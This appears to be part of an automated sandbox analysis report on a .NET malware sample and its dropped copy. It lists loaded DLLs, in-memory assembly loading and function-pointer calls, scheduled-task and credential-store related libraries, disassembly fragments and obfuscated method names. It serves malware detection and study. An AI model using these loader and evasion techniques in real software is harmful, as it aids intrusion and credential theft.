Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	Section loaded: fwpuclnt.dll

Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	.Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	.Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs	.Net Code: hwUiEND30
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs	.Net Code: ooYpdiDj1 System.AppDomain.Load(byte[])
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	.Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs	.Net Code: hwUiEND30
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs	.Net Code: ooYpdiDj1 System.AppDomain.Load(byte[])

Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A63602 push esp; retf	0_2_06A63603
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A65F39 push es; retf	0_2_06A65F88
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A65F1F push es; retf	0_2_06A65F24
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A65F1F push es; retf	0_2_06A65F88
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A660A5 push es; retf	0_2_06A660AC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 0_2_06A66171 push es; iretd	0_2_06A6618C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040D008 push FFFFFFE5h; retf	9_2_0040D01C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00405151 push ebx; ret	9_2_00405152
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040193D pushfd ; iretd	9_2_00401948
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0042B9E2 push eax; ret	9_2_0042B9E4
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004189E4 pushad ; iretd	9_2_004189E5
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004024B6 push ss; iretd	9_2_004024BC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_004025A6 push ss; iretd	9_2_004025AC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0041467F push ebx; ret	9_2_00414682
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00403620 push eax; ret	9_2_00403622
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00413E36 push ss; ret	9_2_00413E3F
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00404F1F push esi; iretd	9_2_00404F2E
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0040CFF6 push 00000003h; retf	9_2_0040CFF8
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_00419FBD push 3CBDF370h; iretd	9_2_00419FC2
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0187225F pushad ; ret	9_2_018727F9
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018727FA pushad ; ret	9_2_018727F9
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018A09AD push ecx; mov dword ptr [esp], ecx	9_2_018A09B6
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0187283D push eax; iretd	9_2_01872858
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01871368 push eax; iretd	9_2_01871369
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD3602 push esp; retf	10_2_06AD3603
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD60A5 push es; retf	10_2_06AD60AC
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD6171 push es; iretd	10_2_06AD618C
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD5F39 push es; retf	10_2_06AD5F88
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD5F1D push es; retf	10_2_06AD5F24
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0119C54D pushfd ; ret	14_2_0119C54E
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0119C54F push 8B011267h; ret	14_2_0119C554

Source: UnmxRI.exe	Static PE information: section name: .text entropy: 6.837498475160513
Source: tehuvFgZlLZK.exe.0.dr	Static PE information: section name: .text entropy: 6.837498475160513

Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Spvk00L9cFCStkrT2y.cs	High entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, SgowY8X4yixBwmDipa9.cs	High entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Bwauf9aYS7ZpZv1l2M.cs	High entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, gWomal9AEbM4h0nux8.cs	High entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	High entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, G8ANMjDiUOOsLbf5bW.cs	High entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QqOQQeGEHtIKD26w4j.cs	High entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, yx3SuvyOU8mOkkWcOq.cs	High entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, SymJM23RQnEk4iIX2O.cs	High entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Ekk9xhzYCDV7Ex5F26.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, p9w2kf7E5ROrPRdwHn.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, dy4scYnfQbod41ZQD7.cs	High entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, dTCWREXjx9L4UMSOtYS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, wg7S07bfqZusaPsJR7.cs	High entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QvFRFSSlmclI2FDck0.cs	High entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, Kwv8QvRh4iT7DFlSdJ.cs	High entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, NXBkOsdoPa6RYALGIN.cs	High entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, SXZXiSZvQcU2WLCXGo.cs	High entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YMmuGV8NrauB8XDf6k.cs	High entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Spvk00L9cFCStkrT2y.cs	High entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SgowY8X4yixBwmDipa9.cs	High entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Bwauf9aYS7ZpZv1l2M.cs	High entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, gWomal9AEbM4h0nux8.cs	High entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	High entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, G8ANMjDiUOOsLbf5bW.cs	High entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QqOQQeGEHtIKD26w4j.cs	High entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, yx3SuvyOU8mOkkWcOq.cs	High entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SymJM23RQnEk4iIX2O.cs	High entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Ekk9xhzYCDV7Ex5F26.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, p9w2kf7E5ROrPRdwHn.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, dy4scYnfQbod41ZQD7.cs	High entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, dTCWREXjx9L4UMSOtYS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, wg7S07bfqZusaPsJR7.cs	High entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QvFRFSSlmclI2FDck0.cs	High entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Kwv8QvRh4iT7DFlSdJ.cs	High entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, NXBkOsdoPa6RYALGIN.cs	High entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SXZXiSZvQcU2WLCXGo.cs	High entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YMmuGV8NrauB8XDf6k.cs	High entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	High entropy of concatenated method names: 'icjOT7esaw', 'RgtTUJcyZL', 'tgAOeop8hG', 'SQdOgp9kxG', 'QvUO4fqikd', 'g2kOnTKoV9', 'gdqsYhH0gi7JU', 'pRVYZ8BkJ', 'JseuiWZFl', 'DLEr932Lv'
